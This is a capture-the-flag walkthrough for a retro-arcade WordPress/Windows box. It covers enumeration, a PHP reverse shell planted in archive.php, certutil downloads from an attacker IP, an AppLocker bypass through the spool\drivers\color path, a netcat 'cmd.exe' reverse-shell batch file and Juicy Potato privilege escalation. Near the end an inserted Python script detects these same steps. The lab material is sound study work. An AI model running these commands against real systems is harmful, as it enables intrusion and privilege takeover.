Less chatting, more hacking.
Let's jump right into it.
Here we're working with a retro arcade, games and all that. Let's see what it's all about...
Upon firing up the machine we get an IP address.
Enumeration
The first thing for every good security operative is enumeration, so we run an nmap scan to see which ports/services are up and running.
We see there are only two ports open, 80 and 3389. That's:
- http and rdp
- It's good practice to enumerate as much as you can
Running ffuf on the http service we find a sub-directory.
You can run ffuf recursively or do it as I did. Heading to the retro directory we see it's a site for games and the like.
From our scans and the page source we see its CMS is WordPress 5.2.1. Head over to the login page (bottom of the website). We're greeted with a typical WordPress login page; all we need is user credentials. Checking the source code we notice a comment link.
Heading to the comment link we get this.
So we can guess the username is wade, and you can try the password from the comment we found. Logging in, we're greeted with a dashboard.
Exploitation
We can get RCE on the WordPress CMS by uploading a PHP reverse shell; we just have to place it well.
Your regular pentest monkey rev-shell won't work (didn't work for me).
So let's go for Rev-shell 2.5
LINK TO THE REV
Replace the archive.php file:
- Change the IP and port at the bottom of the script
- Start a nc listener: 'rlwrap nc -lvnp $port'
- Navigate to archive.php: 'http://10.10.149.150/retro/wp-content/themes/90s-retro/archive.php'
- Remember to change the IP
We're in.
- First things first: enumeration
- Who are we?
- What are our privileges?
Seeing SeImpersonate... is enabled, we can use Juicy Potato for PrivEsc.
- Get the Juicy Potato and netcat binaries
- Host them on your machine
- Download them on the victim machine: 'certutil -urlcache -f attacking-ip:port/file file'
Please note there could be AppLocker on Windows. In our case there is, because if you try running the exe file you'll get a shell that's stuck.
To avoid that, download the exe files into the AppLocker-whitelisted path 'C:\Windows\System32\spool\drivers\color' and do everything you want to do from there.
So yeah, everything seems good.
So now we create a bat file: 'echo C:\Windows\System32\spool\drivers\color\nc.exe -e cmd.exe IP 1515 > reverse.bat'
Running 'wmic service get name,displayname,pathname,startmode' gives us a list of running services.
Choosing a CLSID
Juicy Potato CLSID
Start a netcat listener in a new tab on your machine with the port from the bat file.
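As the defender's counterpart to the steps above, here is an added example (not from the original post) that runs simple detection logic over constructed process-creation events: it flags certutil -urlcache downloads, anything executed from the spool\drivers\color path the post uses to get around AppLocker, and netcat spawning cmd.exe. The Sysmon-like event shape and the 10.10.10.5 attacker address are assumptions.

```python
"""Detect the post-exploitation chain from this writeup in process-creation logs.
Added example, not from the original post. Events below are constructed."""
import re
from typing import Dict, List

# User-writable directory that default AppLocker rules still allow to execute from.
EXEMPT_DIR = r"c:\windows\system32\spool\drivers\color" + "\\"

# Constructed Sysmon-style (Event ID 1) process-creation events.
EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -urlcache -f http://10.10.10.5:8000/nc.exe nc.exe"},
    {"Image": r"C:\Windows\System32\spool\drivers\color\nc.exe",
     "CommandLine": r"C:\Windows\System32\spool\drivers\color\nc.exe -e cmd.exe 10.10.10.5 1515"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -verify cert.cer"},          # benign certutil use
    {"Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"svchost.exe -k netsvcs"},             # benign service host
]


def classify(event: Dict[str, str]) -> List[str]:
    """Return the detection names that fire for one process-creation event."""
    image = event["Image"].lower()
    cmd = event["CommandLine"].lower()
    tokens = cmd.split()
    findings: List[str] = []
    # certutil used as a downloader (LOLBin): -urlcache with a -f (force fetch) flag.
    if image.endswith("certutil.exe") and "-urlcache" in tokens and "-f" in tokens:
        findings.append("lolbin_download")
    # Any binary launched from the writable AppLocker-exempt spool\drivers\color path.
    if image.startswith(EXEMPT_DIR):
        findings.append("exec_from_applocker_exempt_dir")
    # netcat -e handing a shell to a remote listener.
    if re.search(r"\s-e\s+(cmd|powershell)(\.exe)?\b", cmd):
        findings.append("netcat_shell_spawn")
    return findings


def scan(events: List[Dict[str, str]]) -> List[tuple]:
    """Return (image, findings) pairs for every event that triggered a detection."""
    return [(e["Image"], f) for e in events if (f := classify(e))]


if __name__ == "__main__":
    for image, findings in scan(EVENTS):
        print(f"{image}: {', '.join(findings)}")
```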
AND WE ARE DONE
LOOK FOR FILES ON YOUR OWN, it's your little task
Hit me up on Twitter if you run into any issues